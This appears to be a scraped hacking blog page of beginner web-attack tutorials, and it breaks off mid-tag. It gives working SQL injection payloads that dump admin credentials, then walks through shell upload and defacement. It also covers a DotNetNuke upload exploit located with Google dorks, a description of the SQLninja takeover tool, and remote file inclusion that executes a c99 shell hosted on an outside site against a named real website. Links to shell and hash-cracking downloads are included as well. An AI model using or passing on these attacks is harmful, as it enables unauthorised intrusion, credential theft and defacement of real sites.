href="http://www.xmd5.org/">http://www.xmd5.org</a><br /> <a href="http://www.md5cracker.com/index.php">http://www.md5cracker.com/index.php</a><br /> <a href="http://md5.noisette.ch/index.php">http://md5.noisette.ch/index.php</a><br /> <a href="http://md5cracker.org/">http://md5cracker.org</a><br /> <b>Text to ASCII Converter:</b><br /> <a href="http://www.mikezilla.com/exp0012.html?ascii=login&hex=%2578&unicode=%26%23120;">http://www.mikezilla.com/exp0012.html?ascii=login&hex=%2578&unicode=%26%23120;</a><br /> <br /> <a href="http://getyourwebsitehere.com/jswb/text_to_ascii.html">http://getyourwebsitehere.com/jswb/text_to_ascii.html</a><br /> <b>Shell:</b><br /> <a href="http://www.kinginfet.net/shells/">http://www.kinginfet.net/shells/</a><br /> <i><b>Some vulnerable websites</b></i><br /> <b>Starting Tutorial:</b><br /> <b>1. First you need to find vulnerable website.</b><br /> <a href="http://sql-vuln-site.com/index.php?id=15">http://sql-vuln-site.com/index.php?id=15</a><br /> <b>2. Now you need to find columns.</b><br /> <i><code>http://sql-vuln-site.com/index.php?id=15 order by 1-- ( no error )<br /> <br /> <br /> http://sql-vuln-site.com/index.php?id=15 order by 2-- ( no error )<br /> <br /> http://sql-vuln-site.com/index.php?id=15 order by 3-- ( no error )<br /> <br /> http://sql-vuln-site.com/index.php?id=15 order by 4-- ( no error )<br /> <br /> http://sql-vuln-site.com/index.php?id=15 order by 5-- ( no error )<br /> <br /> http://sql-vuln-site.com/index.php?id=15 order by 6-- ( error )</code></i><br /> <b>Error’s looks like this:</b><br /> <i>You have an error in your <span5015358>SQL syntax</span5015358>; check the manual that corresponds to your <span5015358>MySQL server</span5015358> version for the right syntax to use near ‘’39′ at line 1</i><br /> <br /> <br /> <i>database query failure- SELECT * FROM texecom_sidemenu WHERE id=’39</i><br /> <b>3. Now Select columns</b><br /> Columns is 5<br /> <i>http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT 1,2,3,4,5–</i><br /> <b>4. Finding version.</b><br /> So if you not go the bold number 1 , 2, 3 , 4 one of them you will try all.<br /> <br /> I choose 1<br /> <i>http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT @@version,2,3,4,5–</i><br /> you got the version like this:<br /> <br /> <i>5.0.32-Debian_7etch11-log</i><br /> <b>5. Finding Tables</b><br /> <i>http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT table_name,2,3,4,5 from information_schema.tables–</i><br /> And you will got tables like this:<br /> <i>PRODUCTS , ADMINS , and others</i><br /> So must be there table by name: admin , users , user , login , client.<br /> <b>6. Finding Columns in the Table ADMINS.</b><br /> <i>http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char()–</i><br /> We found ADMINS table now go to ASCII web and convert ADMINS<br /> <br /> You will got this ADMINS<br /> <br /> Remove &# and replace ; to ,<br /> <br /> Like this: 65,68,77,73,78,83<br /> <i>You put table_name=char(65,68,77,73,78,83)–</i><br /> <i>http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT column_name,2,3,4,5 from information_schema.columns where table_name=char(65,68,77,73,78,83)–</i><br /> And you will got the columns in table ADMINS<br /> <br /> There need to have columns with names: username and password<br /> <b>7. Getting username and password.</b><br /> <br /> Now we put concat(username,0x3a,password) and admins<br /> <i>http://sql-vuln-site.com/index.php?id=15 UNION ALL SELECT concat(username,0x3a,password),2,3,4,5 from admins–</i><br /> ( 0x3a is ASCII )<br /> <b>8. Finded username and password</b><br /> So you found the username and password<br /> <br /> if the password is hash like this: 2510c39011c5be704182423e3a695e91<br /> <br /> you will need to use MD5 Hash Online Crackers.<br /> <br /> If password is not hash you are lucky and now you need to find admin panel.<br /> <b>9. Finding Admin Panel</b><br /> <br /> Open the tool Admin Finder<br /> <br /> Put the website in the bellow and click Scan.<br /> So you found admin panel and it looks like this http://sql-vuln-site.com/admin/login.php<br /> You open website and there have Username: Password:<br /> <br /> Put username and password what you got.<br /> Done you login in Admin Panel lets <span5015358>upload</span5015358> shell and deface.<br /> <b>10. Uploading Shell and Add Deface</b><br /> <br /> In Admin Panel you will search categories or anything where you can upload a file or picture.<br /> <br /> When you found, you will download shell from the website who i tell you before start tutorial so you will try to upload your shell like: r57.php when you upload it you will see the link of the upload and open it like this:<br /> http://sql-vuln-site.com/upload/r57.php<br /> If can’t upload r57.php change it to r57.jpg.php or r57.txt and try!<br /> You need to make a deface page in html and put in the website<br /> So you open the shell,you will found a file index.php and click on it and there you will remove the php code from index and put your html code.<br /> <b>Congratulations you deface the website.</b>

Hacking Web Hacking SQL Injection and Defacement For Beginners- Tutorial

1. What is SQL Injection? SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database la...

Read more »

DNN (DotNetNuke) Website Hacking – Tutorial

<b>It is easy compared to other hacking attacks such as SQL-Injection and Cross Site <span2670817>Scripting</span2670817>.</b><br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIq9AYzDWN-qk8bG9g-5UD7Xb1b8_OkSkMnva64Vy-PhU1kXIKdXlpiCD_fiQdMnhlUJC4ADnxdw_l-setHywF9jvRz7eANRMvHpXqeedHUb8DbhjcLWTYGPqb6Zqn3CNsSif45FH7q0KK/s1600/5031665479_1a5bb35e42.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIq9AYzDWN-qk8bG9g-5UD7Xb1b8_OkSkMnva64Vy-PhU1kXIKdXlpiCD_fiQdMnhlUJC4ADnxdw_l-setHywF9jvRz7eANRMvHpXqeedHUb8DbhjcLWTYGPqb6Zqn3CNsSif45FH7q0KK/s400/5031665479_1a5bb35e42.jpg" width="400" /></a></div><br /> DotNetNuke is an <span2670817>open source</span2670817> platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide <span2670817>Content Management System</span2670817>(CMS) for the <span2670817>personal website</span2670817>.<br /> Below are the easy steps to implement the attack:<br /> • First use a google dork to find the appropriate target.<br /> <i>inurl:”/portals/0? site:.com </i><br /> • You can change com to your desired domain name like bd ph ae<br /> <br /> <br /> • Now search your website on the google after searching you will get many websites choose any one of it.<br /> • Its time to check the required vulnerability on the website just place this code after the <span2670817>web address</span2670817>.<br /> <i>Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx</i><br /> • For example if you got www.victim.com<br /> <br /> • Replace it www.victim.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx<br /> <br /> • If you will get this screen means this web is going to hack.<br /> <a href="http://hackingmania.com/Blog/dnn-dotnetnuke-website-hacking-tutorial/%20/dnn1-300x279" rel="attachment wp-att-744"><img alt="dnn1 300x279 DNN (DotNetNuke) Website Hacking Tutorial" class="aligncenter size-full wp-image-744" height="279" src="http://hackingmania.com/Blog/wp-content/uploads/2011/03/dnn1-300x279.jpg" title="dnn1-300x279" width="300" /></a><br /> • Now choose the third option “A File On Your Site” And than paste this java code on your address bar.<br /> <br /> <i>javascript:__doPostBack(‘ctlURL$cmdUpload’,”)</i><br /> • It will allow you to upload a files on this website you can upload text ~ <span2670817>swf</span2670817> ~ jpg ~ gif ~ pdf ~ Files.<br /> • After uploading files you can find your file on this address www.victim.com/portals/0/yourfile.extension<br /> here extension is txt jpg swf etc.<br /> • In our case<br /> <i>www.victim.com/portals/0/b.txt</i>

Web Hacking DNN (DotNetNuke) Website Hacking – Tutorial

It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting . DotNetNuke is an open source platform for ...

Read more »

SQLninja - An SQL Server injection & takeover tool

<div dir="ltr" style="text-align: left;" trbidi="on"><h3 class="post-title entry-title">SQLninja - An SQL Server injection & takeover tool</h3><div style="float: left; padding: 5px;"><a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fwww.techkranti.com%2F2010%2F11%2Fsqlninja-sql-server-injection-takeover.html&src=sp" name="fb_share" rel="nofollow" style="text-decoration: none;" type="button"><span class="FBConnectButton FBConnectButton_Small" style="cursor: pointer;"><span class="FBConnectButton_Text"></span></span></a> </div><br /> <br /> Fancy going from a SQL Injection on Microsoft SQL Server to a full GUI access on the DB? Take a few new SQL Injection tricks, add a couple of remote shots in the registry to disable Data Execution Prevention, mix with a little Perl that automatically generates a debug script, put all this in a shaker with a Metasploit wrapper, shake well and you have just one of the attack modules of sqlninja!<br /> <br /> Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.<br /> <br /> Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.<br /> <a href="http://draft.blogger.com/post-edit.g?blogID=7392073712425951755&postID=9043553071132422593" name="more"></a><br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmtFNw0Gg76m9-DrmGyXddO16fsEsN1rAJeTcBCvMHS9nYhWn66LhlDCaaLK_jxNW_MwgmCx20JSIrje3U_1geK3m7wKSofRFYDCWgNviHXGxgCW0Gfk0lZuU_sLzY12zg5YLaRemNA1kx/s1600/logo.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmtFNw0Gg76m9-DrmGyXddO16fsEsN1rAJeTcBCvMHS9nYhWn66LhlDCaaLK_jxNW_MwgmCx20JSIrje3U_1geK3m7wKSofRFYDCWgNviHXGxgCW0Gfk0lZuU_sLzY12zg5YLaRemNA1kx/s400/logo.png" width="400" /></a></div><ul><li>Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)</li> <li>Bruteforce of 'sa' password (in 2 flavors: dictionary-based and incremental)</li> <li>Privilege escalation to sysadmin group if 'sa' password has been found</li> <li>Creation of a custom xp_cmdshell if the original one has been removed</li> <li>Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)</li> <li>TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell</li> <li>Direct and reverse bindshell, both TCP and UDP</li> <li>DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works) </li> <li>Evasion techniques to confuse a few IDS/IPS/WAF</li> <li>Integration with Metasploit3, to obtain a graphical access to the remote DB server through a VNC server injection</li> <li>Integration with churrasco.exe, to escalate privileges to SYSTEM on w2k3 via token kidnapping </li> </ul><br /> <br /> <h1>Platforms supported</h1>Sqlninja is written in Perl and should run<br /> <br /> on any UNIX based platform with a Perl interpreter, as long as all<br /> <br /> needed modules have been installed. So far it has been successfully<br /> <br /> tested on:<br /> <br /> <ul><li>Linux</li> <li>FreeBSD</li> <li>Mac OS X</li> </ul><br /> <br /> Download Page: <a href="http://sqlninja.sourceforge.net/">http://sqlninja.sourceforge.net/</a> </div>

Hacking Hacking Tools Web Hacking SQLninja - An SQL Server injection & takeover tool

SQLninja - An SQL Server injection & takeover tool Fancy going from a SQL Injection on Microsoft SQL Server to a full GUI access o...

Read more »

Hacking Website Using Remote File Inclusion

<div dir="ltr" style="text-align: left;"><br /> <br /> <br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeKrKXXeiM2EPtEF8NgZjopzX1VdBSYBz1AYTT6J4yCgpkjcSOZUrSY2I5l_tayCitG6uTCIhWbEoPTtKZTiGejL-BkvWcVvu16gn9L2WWNSzaQSFBkJr35w_SzrtVtiwvSXeo3gagpmDG/s1600/Untitled-1.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgeKrKXXeiM2EPtEF8NgZjopzX1VdBSYBz1AYTT6J4yCgpkjcSOZUrSY2I5l_tayCitG6uTCIhWbEoPTtKZTiGejL-BkvWcVvu16gn9L2WWNSzaQSFBkJr35w_SzrtVtiwvSXeo3gagpmDG/s320/Untitled-1.jpg" width="320" /></a></div>Welcome back to hacking-class.In this article I will tell about <b>Remote file inclusion</b> It is basically  one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it..<br /> <br /> <br /> <br /> <div style="text-align: justify;"><b>1-Searching the Vulnerability </b></div><div style="text-align: justify;">Remote File inclusion vulnerability is usually occured in those sites which have a url similar to the below one</div><blockquote><div style="text-align: justify;"><b><i><a class="smarterwiki-linkify" href="http://www.targetsite.com/index.php?page=Anything">www.Targetsite.com/index.php?page=Anything</a></i></b> </div></blockquote>The Google Dork is<br /> <br /> <br /> <blockquote><b><i>“inurl:index.php?page=”</i></b></blockquote><div style="text-align: justify;"><b><span style="font-weight: normal;">This will show all the pages which has “</span>index.php?page=<span style="font-weight: normal;">” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker normaly use the following command</span></b></div><div style="text-align: justify;"><br /> <br /> </div><blockquote><div style="text-align: justify;"><b><i><a class="smarterwiki-linkify" href="http://www.targetsite.com/index.php?page=www.google.com">www.targetsite.com/index.php?page=www.google.com</a></i></b><b><span style="font-weight: normal;"> </span></b></div><div style="text-align: justify;"><br /> <br /> </div></blockquote><b><span style="font-size: xx-small;">But as I am Posting this here so the links must be hatke :P</span></b><br /> <br /> <br /> <br /> I found this site it is very good to give you example<br /> <br /> <br /> <br /> <blockquote><i><a class="smarterwiki-linkify" href="http://www.cbspk.com/">http://www.cbspk.com</a></i></blockquote><br /> <br /> Now we wanna check if it is vulnerable .. we type<br /> <br /> <br /> <br /> <br /> <blockquote><b><i>http://www.cbspk.com/v2/index.php?page=http://www.hackermafia.blogspot.com<a href="http://www.cbspk.com/v2/index.php?page=http://www.hackermafia.blogspot.com">http://www.cbspk.com/v2/index.php?page=http://www.hackermafia.blogspot.com</a></i></b></blockquote><br /> <br /> <i>Now This appears </i><br /> <br /> <i> </i><br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimMNG8qac0ZaQS-I1RH2KL8IgBwB3d2AIFNMBWKpbtq6Byhi7fFF-QAF0nOq-Ka_FhzV61GenwLSWCmMkqxPP8vvskVtdNgXyUnfwoWyRG_CLdBq29kahOoNDNiEXZaxTqLV5bIwX9XGGj/s1600/cats.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimMNG8qac0ZaQS-I1RH2KL8IgBwB3d2AIFNMBWKpbtq6Byhi7fFF-QAF0nOq-Ka_FhzV61GenwLSWCmMkqxPP8vvskVtdNgXyUnfwoWyRG_CLdBq29kahOoNDNiEXZaxTqLV5bIwX9XGGj/s400/cats.jpg" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3G0s-odoVHvg-iisLktorAUcG4weW8d-u_4FHxnvIFWYJNURQO_mzXlrVjXLweCT3xryEte2B7A5Y2-6a6u97lxwoWml4nltvGC9Z6Po5MwUBlDlNIWP0QU1tStr3EOG3anOJEAjwZ1cA/s1600/cats.jpg" style="margin-left: 1em; margin-right: 1em;"><br /> <br /> </a></div><i> </i><br /> <br /> A website opens in another website this means this website is vulnerable to RFI.<br /> <br /> <br /> <br /> You can also type<br /> <br /> <br /> <br /> <br /> <blockquote><a href="http://www.cbspk.com/v2/index.php?page=http://www.google.com">http://www.cbspk.com/v2/index.php?page=http://www.google.com</a></blockquote><br /> <br /> and u will get some similar results.<br /> <br /> <br /> <br /> Ok now Moving On to the next part...<br /> <br /> <u><i><b><br /> <br /> </b></i></u><br /> <br /> <u><i><b><b><span style="font-weight: normal;">Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. </span></b></b></i></u><br /> <br /> <br /> <br /> <div style="text-align: justify;"><b><span style="font-weight: normal;">The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc. </span></b></div><div style="text-align: justify;"><b><span style="font-weight: normal;">Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is.</span></b></div><div style="text-align: justify;"><br /> <br /> </div><blockquote><div style="text-align: justify;"><b><span style="font-weight: normal;">http://h1.ripway.com/saurav1234/c99shell.php? </span></b></div></blockquote>Now here how the hacker will execute the command  on the website<br /> <br /> <br /> <br /> <br /> <blockquote><a href="http://www.blogger.com/%20%20%20%20http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/saurav1234/c99shell.php?%20"> http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/saurav1234/c99shell.php? </a><br /> <br /> <span style="font-weight: normal;"></span></blockquote>Now whoila We have executed the shell<br /> <br /> <br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP9sMuyClrcpXbgB_HvpXjP_9nCqYtb_VhiULEOH7V5iq5IAuxNoTbY1-LVQyrtl3qRycxgo-RtrdrYopwlIUAhCZBKUYm-JPKD1pZ0YP2msn5tToLcqBIgYRudsWFh1Kx_asf5pHcOfY6/s1600/cats.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP9sMuyClrcpXbgB_HvpXjP_9nCqYtb_VhiULEOH7V5iq5IAuxNoTbY1-LVQyrtl3qRycxgo-RtrdrYopwlIUAhCZBKUYm-JPKD1pZ0YP2msn5tToLcqBIgYRudsWFh1Kx_asf5pHcOfY6/s400/cats.jpg" width="400" /></a></div><br /> <br /> <br /> <br /> <br /> <br /> <b><span style="font-weight: normal;"> <span style="font-size: xx-small;">Now I will not tell how to run your scripts using the shell try finding out your self.</span></span></b><br /> <br /> <br /> <br /> <u><i><b><span style="font-weight: normal;">NOte- </span></b><b><span style="font-weight: normal;">Remember to add “?” at the end of url or else the shell will not execute..</span></b></i></u><br /> <br /> <br /> <br /> <br /> <i><b><b style="color: red;"><span style="font-weight: normal;">This is for educational purposes only using this knowledge in a illegal way  is strictly prohibited.</span></b></b></i><b><span style="font-weight: normal;"> </span></b></div>

Hacking Web Hacking Hacking Website Using Remote File Inclusion

Welcome back to hacking-class.In this article I will tell about Remote file inclusion It is basically  one of the most common vulnerab...

Read more »

Password Cracking with Rainbowcrack and Rainbow Tables

<div dir="ltr" style="text-align: left;" trbidi="on"><b>What is RainbowCrack & Rainbow Tables?</b><br /> <br /> RainbowCrack is a general propose implementation of Philippe Oechslin’s faster time-memory trade-off technique.<br /> <br /> <div class="separator" style="clear: both; text-align: center;"><a href="http://www.kanmandet.dk/wp-content/uploads/2011/01/cracking.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="http://www.kanmandet.dk/wp-content/uploads/2011/01/cracking.png" width="320" /></a></div><br /> <br /> <blockquote>In 1980 Martin Hellman described a cryptanalytic time-memory trade-off which reduces the time of cryptanalysis by using precalculated data stored in memory. This technique was improved by Rivest before 1982 with the introduction of distinguished points which drastically reduces the number of memory lookups during cryptanalysis. This improved technique has been studied extensively but no new optimisations have been published ever since.</blockquote>You can find the official Rainbowcrack project <a href="http://www.project-rainbowcrack.com/">here</a>, where you can download the latest version of Rainbowcrack.<br /> <br /> <blockquote>In short, the RainbowCrack tool is a hash cracker. A traditional brute force cracker try all possible plaintexts one by one in cracking time. It is time consuming to break complex password in this way. The idea of time-memory trade-off is to do all cracking time computation in advance and store the result in files so called “rainbow table”.</blockquote>Basically these types of password crackers are working with pre-calculated hashes of ALL passwords available within a certain character space, be that a-z or a-zA-z or a-zA-Z0-9 etc.<br /> <br /> These files are called <a href="http://en.wikipedia.org/wiki/Rainbow_table">Rainbow Tables</a>.<br /> <br /> You are trading speed for memory and disk space, the Rainbow Tables can be VERY large.<br /> <br /> Be warned though, Rainbow tables can be defeated by salted hashes, if the hashes are not salted however and you have the correct table, a complex password can be cracked in a few minutes rather than a few weeks or months with traditional <a href="http://en.wikipedia.org/wiki/Brute_force_attack">brute forcing techniques</a>.<br /> <br /> <b>So where do I get these Rainbow Tables?</b><br /> <br /> You can generate them yourself with RainbowCrack, this will take a long time, and a lot of diskspace.<br /> <br /> Project Shmoo is offering downloads of popular Rainbow Tables via <a href="http://www.bittorrent.com/">BitTorrent</a>.<br /> <br /> <a href="http://rainbowtables.shmoo.com/">http://rainbowtables.shmoo.com/</a><br /> <br /> If you wanted to, you could even buy the tables from <a href="http://www.rainbowtables.net/">http://www.rainbowtables.net/</a>.<br /> <br /> Or these guys, not free but cheap <a href="http://www.rainbowcrack-online.com/">http://www.rainbowcrack-online.com/</a><br /> <br /> Some free tables here <a href="http://wired.s6n.com/files/jathias/index.html">http://wired.s6n.com/files/jathias/index.html</a><br /> <br /> <b>What software is available for use with Rainbow Tables?</b><br /> <br /> There is of course the original RainbowCrack as mentioned above.<br /> <br /> Then there is:<br /> <br /> <a href="http://ophcrack.sourceforge.net/">Ophcrack</a><br /> <br /> <blockquote><b>Ophcrack</b> is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman’s original trade-off, with better performance.</blockquote><a href="http://www.oxid.it/cain.html">Cain and Abel</a> (newly added support for Rainbow Tables)<br /> <br /> <blockquote><b>Cain & Abel</b> is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. </blockquote><i><b>Cain and Abel is personally my favourite fully featured password whacking tool, it also has a good packet sniffer, which grabs and decodes passwords and many methods for password cracking. The interface is decent too. I’ll write more on how to get the most out of Cain later.</b></i><br /> <br /> <a href="http://www.l0phtcrack.com/">L0phtcrack or LC5</a><br /> <br /> <blockquote><b>LC5</b> is the latest version of L0phtCrack, the award-winning password auditing and recovery application used by thousands of companies worldwide.</blockquote><b><i>Please note this is a COMMERCIAL product.</i></b><br /> <br /> <a href="http://www.lcpsoft.com/english/index.htm">LCP</a><br /> <br /> <blockquote>Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003</blockquote>Thankfully there is a freeware alternative to LC5 in the form of <a href="http://www.lcpsoft.com/english/index.htm">LCP</a>.<br /> <br /> <b>Other Resources</b><br /> <a href="http://www.rainbowcrack.com/">http://www.rainbowcrack.com/</a><br /> <br /> <a href="http://sarcaprj.wayreth.eu.org/">http://sarcaprj.wayreth.eu.org/</a><br /> <br /> <a href="http://passcracking.com/">http://passcracking.com/</a><br /> <br /> <a href="http://www.md5lookup.com/">http://www.md5lookup.com/</a><br /> <br /> <a href="http://www.plain-text.info/">http://www.plain-text.info/</a><br /> <br /> <a href="http://ap0x.headcoders.net/xHashBrutter.rar">http://ap0x.headcoders.net/xHashBrutter.rar</a><br /> <br /> <a href="http://www.loginrecovery.com/">http://www.loginrecovery.com/</a></div>

Password Cracking Web Hacking Password Cracking with Rainbowcrack and Rainbow Tables

What is RainbowCrack & Rainbow Tables? RainbowCrack is a general propose implementation of Philippe Oechslin’s faster time-memory trad...

Read more »

What is Remote File Inclusion (RFI) Web Hacking ?

<div dir="ltr" style="text-align: left;" trbidi="on"><div style="background-attachment: initial; background-clip: initial; background-color: white; background-image: url(http://www.blogger.com/post-create.g?blogID=1872143086289485572); background-origin: initial; background-position: 100% 0%; background-repeat: no-repeat no-repeat; margin-bottom: 3px; margin-left: 3px; margin-right: 3px; margin-top: 3px;"><span class="Apple-style-span" style="font-family: inherit;">Hey friends...Now we will know about W</span>ebsite hacking method "<b>Remote File Inclusion (RFI)</b>" . This exploits are very simple and are only found in about 1 in every 10 sites - they are still allot of fun to exploit. In this tutorial i will show you how to take advantage of this coding error and possibly take control of the site.This ICA article is for <b>Educational Purpose Only...so please Use this for knowledge Only !</b><br /> <br /> <div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3e3iCtMMzpAkO58vl5I615GSvdkh0_zQbZcV0en6iqnZVK_eO28Bly5go7C6MBGheNpAQRLAlZaxjNkq_cl0_cogvKrM6N9ZRPgb-IctuFVxr7BNa_l5HM9J7koHsdCBQ99Ge0amjPzG0/s1600/What+is+Remote+File+Inclusion+%2528RFI%2529+Web+Hacking.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3e3iCtMMzpAkO58vl5I615GSvdkh0_zQbZcV0en6iqnZVK_eO28Bly5go7C6MBGheNpAQRLAlZaxjNkq_cl0_cogvKrM6N9ZRPgb-IctuFVxr7BNa_l5HM9J7koHsdCBQ99Ge0amjPzG0/s320/What+is+Remote+File+Inclusion+%2528RFI%2529+Web+Hacking.jpg" width="320" /></a></div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUBFaukIa8x6I1irm4dzifTCiiQjagQlf3gJdrvIT1wOfu17tP6GHOlfXKH0lkGOAyhRiXn2P23JNBoiv7CCxCok5p8CacCTKq77EwRJ-YztlJIx1OEeEFM9f1yWeDCmo_6hAyyr_cbUM/s1600/What+is+Remote+File+Inclusion+%2528RFI%2529+Web+Hacking.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /> </a><br /> <span class="Apple-style-span" style="font-family: inherit;"><br style="font-style: italic;" /></span><br /> <br /> <span class="Apple-style-span" style="font-family: inherit;"><span style="font-style: italic;">This articles will be unserstandable mostly by web developers,or how know some web programming in html,php,asp etc...</span>Lets start..</span><br /> <br /> <span class="Apple-style-span" style="font-family: inherit;"><br /> <br /> </span><br /> <br /> <span class="Apple-style-span" style="font-family: inherit;">A <b>Remote File Inclusion</b> vulnerability is where we trick the web server in to putting our file (file uploader / php shell) in to the web page. It then parses our PHP script and we then have full control over the server. The exploit works because when a website calls another page to be displayed except, we edit the url so that the website thinks our shell is the page to display.</span><br /> <br /> <span class="Apple-style-span" style="font-family: inherit;"><br /> <br /> </span><br /> <br /> <span class="Apple-style-span" style="font-family: inherit;">Normally, I'm against stuff like this. I believe people should find their own vulnerablesites. But, for the sake of this paper, i will show you how we can use google to get us vulnerable sites.</span><br /> <br /> <span class="Apple-style-span" style="font-family: inherit;"><br /> <br /> </span><br /> <br /> <span class="Apple-style-span" style="font-family: inherit;">We will query google like so:</span><br /> <br /> <div class="codeblock"><div class="asp" contenteditable="true" style="background-attachment: scroll; background-clip: initial; background-color: cornsilk; background-image: none; background-origin: initial; background-position: 0% 0%; background-repeat: repeat repeat; border-bottom-color: silver; border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: silver; border-left-style: dashed; border-left-width: 1px; border-right-color: silver; border-right-style: dashed; border-right-width: 1px; border-top-color: silver; border-top-style: dashed; border-top-width: 1px; margin-bottom: 10px; margin-left: 10px; margin-right: 10px; margin-top: 10px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;"><div class="body" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><code><span class="Apple-style-span" style="font-family: inherit;">inurl:"index.php?page="</span></code></div></div></div><span class="Apple-style-span" style="font-family: inherit;"><br /> <br /> </span><br /> <br /> <span class="Apple-style-span" style="font-family: inherit;">This query asks google to give us any page with <b>index.php?page=</b> in the url. If we look at it, we can see that 'page' is calling up whatever is after the equals sign. This is where the actual exploit lies. A good test to see if a website is actually vulnerable is to enter</span><br /> <br /> <span class="Apple-style-span" style="font-family: inherit;"><a href="http://www.google.com/" target="_blank">http://www.google.com</a> after the equal sign.</span><br /> <br /> <div class="codeblock"><div class="body" dir="ltr"><div class="asp" contenteditable="true" style="background-attachment: scroll; background-clip: initial; background-color: cornsilk; background-image: none; background-origin: initial; background-position: 0% 0%; background-repeat: repeat repeat; border-bottom-color: silver; border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: silver; border-left-style: dashed; border-left-width: 1px; border-right-color: silver; border-right-style: dashed; border-right-width: 1px; border-top-color: silver; border-top-style: dashed; border-top-width: 1px; margin-bottom: 10px; margin-left: 10px; margin-right: 10px; margin-top: 10px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;"><span class="Apple-style-span" style="font-family: inherit;">www.site.com/index.php?page=www.google.com</span></div></div></div><span class="Apple-style-span" style="font-family: inherit;"><br /> <br /> </span><br /> <br /> <span class="Apple-style-span" style="font-family: inherit;">It is not nessesry that every site will work loke above statement....Only those will redirect to google,which having the security holes...</span><br /> <br /> <span class="Apple-style-span" style="font-family: inherit;">If the full google.com website appears on the page, the websiteis vulnerable. If not, keep looking. To exploit the vulnerability we must first look at the following example of a RFI:</span><br /> <br /> <div class="codeblock"><div class="body" dir="ltr"><div style="left: 10px; position: relative; top: 10px;"><span class="Apple-style-span" style="font-family: inherit;">this is an example only,There is no such sites or file....</span></div><div class="asp" contenteditable="true" style="background-attachment: scroll; background-clip: initial; background-color: cornsilk; background-image: none; background-origin: initial; background-position: 0% 0%; background-repeat: repeat repeat; border-bottom-color: silver; border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: silver; border-left-style: dashed; border-left-width: 1px; border-right-color: silver; border-right-style: dashed; border-right-width: 1px; border-top-color: silver; border-top-style: dashed; border-top-width: 1px; margin-bottom: 10px; margin-left: 10px; margin-right: 10px; margin-top: 10px; padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px;"><span class="Apple-style-span" style="font-family: 